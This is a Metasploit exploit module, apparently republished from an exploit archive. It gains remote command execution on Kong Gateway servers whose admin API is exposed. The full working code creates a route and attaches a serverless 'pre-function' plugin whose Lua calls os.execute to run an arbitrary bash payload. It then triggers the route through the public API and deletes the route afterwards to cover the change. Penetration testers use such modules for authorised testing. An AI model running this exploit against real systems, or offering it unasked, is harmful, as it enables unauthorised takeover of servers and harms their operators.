This Metasploit module uses the Kong admin API to create a route and a serverless function plugin that is associated with the route. The plugin runs Lua code and is used to run a system command using os.execute(). After execution the route is deleted, which also deletes the plugin.
4bafd791ffc69e6f0e7e5e659d5843334eaeb9b206ab4512782cccf29ffe011a
# frozen_string_literal: true
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(
info,
'Name' => 'Kong Gateway Admin API Remote Code Execution',
'Description' => '
This module uses the Kong admin API to create a route and a serverless function plugin that is associated with
the route. The plugin runs Lua code and is used to run a system command using os.execute(). After execution the
route is deleted, which also deletes the plugin.',
'License' => MSF_LICENSE,
'Author' => ['Graeme Robinson'],
'References' =>
[
['URL', 'https://konghq.com/'],
['URL', 'https://github.com/Kong/kong'],
['URL', 'https://docs.konghq.com/hub/kong-inc/serverless-functions/']
],
'Platform' => %w[linux macos],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[[
'Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory
]],
'Privileged' => false,
'DisclosureDate' => 'Oct 13 2020',
'DefaultOptions' => { 'RPORT' => 8001 },
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
))
register_options(
[
OptString.new('PUBLIC-API-RHOST', [false, 'The host where the public API is available, if different to RHOST']),
OptInt.new('PUBLIC-API-RPORT', [true, 'The port where the public API is available', 8000]),
OptString.new('TARGETURI', [true, 'URI to the Kong server', '/'])
],
self.class
)
end
def check_response(response, expected, path, description)
fail_with(Failure::Unreachable, "No response received from #{path} when #{description}") unless response
return if response.code == expected
fail_with(Failure::UnexpectedReply,
"Unexpected response from #{path} when #{description} (received #{response.code}, expected #{expected})")
end
def create_route
path = normalize_uri(target_uri.path, 'routes')
response = send_request_cgi({ 'method' => 'POST', 'uri' => path,
'vars_post' => { 'name' => @rand_name, 'paths' => '/' + @rand_name } })
check_response(response, 201, path, 'creating route')
end
def create_plugin
# The double square brackets helps to ensure single/double quotes in cmd payload do not interfere with syntax of
# os.execute Lua function. The ampersand backgrounds the command so that it doesn't cause Kong to hang.
cmd = %{os.execute([[bash -c "#{payload.encoded}" &]])}
path = normalize_uri(target_uri.path, 'routes', @rand_name, 'plugins')
response = send_request_cgi({ 'method' => 'POST', 'uri' => path,
'vars_post' => { 'name' => 'pre-function', 'config.access' => cmd } })
check_response(response, 201, path, 'creating plugin')
end
def request_route
path = normalize_uri(target_uri.path, @rand_name)
rhost = datastore['PUBLIC-API-RHOST'] if datastore['PUBLIC-API-RHOST']
rport = datastore['PUBLIC-API-RPORT'] if datastore['PUBLIC-API-RPORT']
retry_count = 0
begin
response = send_request_cgi({ 'uri' => path, 'rhost' => rhost, 'rport' => rport })
check_response(response, 503, path, 'requesting route')
rescue Msf::Exploit::Failed
maximum_retries = 3
if retry_count <= maximum_retries
retry_count += 1
print_status("Route not yet available, trying again - attempt #{retry_count}/#{maximum_retries}")
sleep(retry_count**2)
retry
end
raise
end
end
def delete_route
path = normalize_uri(target_uri.path, 'routes', @rand_name)
# Delete it
response = send_request_cgi({ 'method' => 'DELETE', 'uri' => path })
check_response(response, 204, path, 'deleting route')
# Check Whether it deleted
response = send_request_cgi({ 'uri' => path })
check_response(response, 404, path, 'verifying that route has been deleted')
end
def check
@route_cleanup_required = false
# Check admin API
response = send_request_cgi
return CheckCode::Unknown unless response
return CheckCode::Safe unless response.get_json_document['tagline'] == 'Welcome to kong'
# Check public API
rhost = datastore['PUBLIC-API-RHOST'] if datastore['PUBLIC-API-RHOST']
rport = datastore['PUBLIC-API-RPORT'] if datastore['PUBLIC-API-RPORT']
path = normalize_uri(target_uri.path, @rand_name)
response = send_request_cgi({ 'rport' => rport, 'rhost' => rhost, 'uri' => path })
return CheckCode::Unknown unless response
return CheckCode::Safe unless response.get_json_document['message'] == 'no Route matched with those values'
CheckCode::Appears
end
def exploit
@rand_name = rand_text_alphanumeric(10)
@route_cleanup_required = false
fail_with(Failure::UnexpectedReply, 'Admin API not detected') unless check == CheckCode::Appears
@route_cleanup_required = true
create_route
vprint_good("Created route #{@rand_name}")
create_plugin
vprint_good("Created plugin for route #{@rand_name}")
request_route
vprint_good("Requested route #{@rand_name} using public API")
end
def cleanup
return unless @route_cleanup_required
delete_route
vprint_good("Deleted route #{@rand_name}")
end
end